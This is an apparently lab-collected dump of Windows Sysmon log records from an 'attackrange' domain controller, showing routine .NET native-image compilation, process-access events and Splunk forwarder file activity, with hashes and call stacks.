AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RXHUSAOTHD\System.Activities.DurableInstancing.ni.dll.auxMD5=0B5CA90882AC7CCCAE7B06D6FEB49D3E,SHA256=05761CE9827BEF33452CF10F38AD1433E8F6061672AF40949D0B3BB282567881,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023469Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.686{4DB9351A-A27F-60D3-BA05-00000000CF01}5476NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RXHUSAOTHD\System.Activities.DurableInstancing.ni.dllMD5=7A5E72329A65193A9D84A77E2524E09B,SHA256=DAA524631E92431901828CC76F40CC719855B548288997777080143EF8AD412E,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023468Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.670{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27F-60D3-BA05-00000000CF01}5476C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023467Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.655{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27F-60D3-BA05-00000000CF01}5476C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023466Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.655{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27F-60D3-BA05-00000000CF01}5476C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023465Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.639{4DB9351A-A27F-60D3-B905-00000000CF01}5844NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\CB6UMV4BRY\System.Activities.Core.Presentation.ni.dll.auxMD5=5BB415D2811BC7CBE29D778C7F477337,SHA256=60E99F952942738B901D5816C39F96094DB78D19C39FEFC5B566B6448213D411,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023464Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.639{4DB9351A-A27F-60D3-B905-00000000CF01}5844NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\CB6UMV4BRY\System.Activities.Core.Presentation.ni.dllMD5=FF3D6C89D4C8880F2D527D7C6103AE19,SHA256=39BF5BE8F6BF48259D7E2316185A8C08F666F3921E0F7FC61D648A32140B18E3,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023463Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.530{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29E7B637ED1D1FDB5D796B971BD2EA70,SHA256=05B843C78DC7B8A4CEAB0C35D1F9151D308E09A77BC83E16EE5024F55E4477A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023462Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.530{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5CB57B526CA4D2CCC8F369ADF6656C1A,SHA256=71A583A6A8BC656CFC7A446A3A4924EB1E95AA5F84C58E5A9211DE9CA003ED24,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023461Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.483{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27F-60D3-B905-00000000CF01}5844C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023460Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.467{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A27F-60D3-B905-00000000CF01}5844C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023459Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.467{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27F-60D3-B905-00000000CF01}5844C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023458Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.467{4DB9351A-A27F-60D3-B805-00000000CF01}3256NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\9QAIJVRSAA\System.Activities.ni.dll.auxMD5=25B7A8847291214AA7EDA57DA7484C02,SHA256=C9C9011ADA19818E2F42AB129F28892F4F21E8D77DDA15C45E394CF3900BDD7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023457Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.467{4DB9351A-A27F-60D3-B805-00000000CF01}3256NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\9QAIJVRSAA\System.Activities.ni.dllMD5=711B3E8DE0A6701457B428B1794C9117,SHA256=71AE2094C2B4D81B69066D34D897D287921A4268E0A5E01EF0C35A3D7845EB25,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023456Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.045{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27F-60D3-B805-00000000CF01}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023455Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.030{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A27F-60D3-B805-00000000CF01}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023454Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.030{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27F-60D3-B805-00000000CF01}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023453Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.030{4DB9351A-A27E-60D3-B705-00000000CF01}6304NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\KDQVTN4XI4\SrpUxSnapIn.ni.dll.auxMD5=883998006193734CB5F193AA8F53C9A3,SHA256=ECB630E2700A1DF970DEF693EA3FECF956D310CD6D7686AE65BAAD6603CAE64B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023452Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:11.030{4DB9351A-A27E-60D3-B705-00000000CF01}6304NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\KDQVTN4XI4\SrpUxSnapIn.ni.dllMD5=D7EC1FDEA05B74AC18016CA3D2F3821F,SHA256=1F20CC7DAEBCA7732D3B3088A56CD6176E94DEA5E7BC965690D841070B855C55,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023500Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.670{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2A653AD70FF9DF86A6F55A14055B761,SHA256=6A5532A3C03D6C39F9B6591DC894FD91F5C6BBA2AD39CDCC30EA41DDA9EBA272,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023499Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.670{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D5F9DCAEF504FC473DEA150EFF702C4D,SHA256=3950E5C0C1EC4EE62A9680B4CD3EA280272A0DCCDAA8D2BC01D86C4889588EBF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023498Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.342{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A280-60D3-C005-00000000CF01}6624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023497Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.326{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A280-60D3-C005-00000000CF01}6624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023496Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.326{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A280-60D3-C005-00000000CF01}6624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023495Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.326{4DB9351A-A280-60D3-BF05-00000000CF01}6728NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\5LHE2E6NX6\System.Data.DataSetExtensions.ni.dll.auxMD5=3014C72050FF75BF0836AAB7DC0DE2AD,SHA256=1EC5A380DB071E8C1559C5005EE29CC78AA3A97EAAD29F933E3D8339FDB1ACDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023494Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.326{4DB9351A-A280-60D3-BF05-00000000CF01}6728NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\5LHE2E6NX6\System.Data.DataSetExtensions.ni.dllMD5=C179D64F8D1D8E2EE3529996C4A84CEE,SHA256=4C509155E68E6EA6D9EF00FC8F39D3AEFD940149EE92E1550D183A575DBA4D2B,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023493Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.295{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A280-60D3-BF05-00000000CF01}6728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023492Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.280{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A280-60D3-BF05-00000000CF01}6728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023491Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.280{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A280-60D3-BF05-00000000CF01}6728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023490Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.280{4DB9351A-A280-60D3-BE05-00000000CF01}7116NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\G070MYOJCS\System.ComponentModel.Composition.Registration.ni.dll.auxMD5=39A991F1C4FC98AC336BA4513B9E1FEA,SHA256=F3CE2B333FE03655222DF90C03E85D82C13D6996F69C14E95404ED8AF8BCF992,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023489Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.280{4DB9351A-A280-60D3-BE05-00000000CF01}7116NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\G070MYOJCS\System.ComponentModel.Composition.Registration.ni.dllMD5=2E1EF7D6FC2EAFED0E5A4348DAE8AC90,SHA256=B36DEBC127BA86FAE7EDC46786053DF717CF9C79D304B7206D881D1D0170C414,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023488Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.248{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A280-60D3-BE05-00000000CF01}7116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023487Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 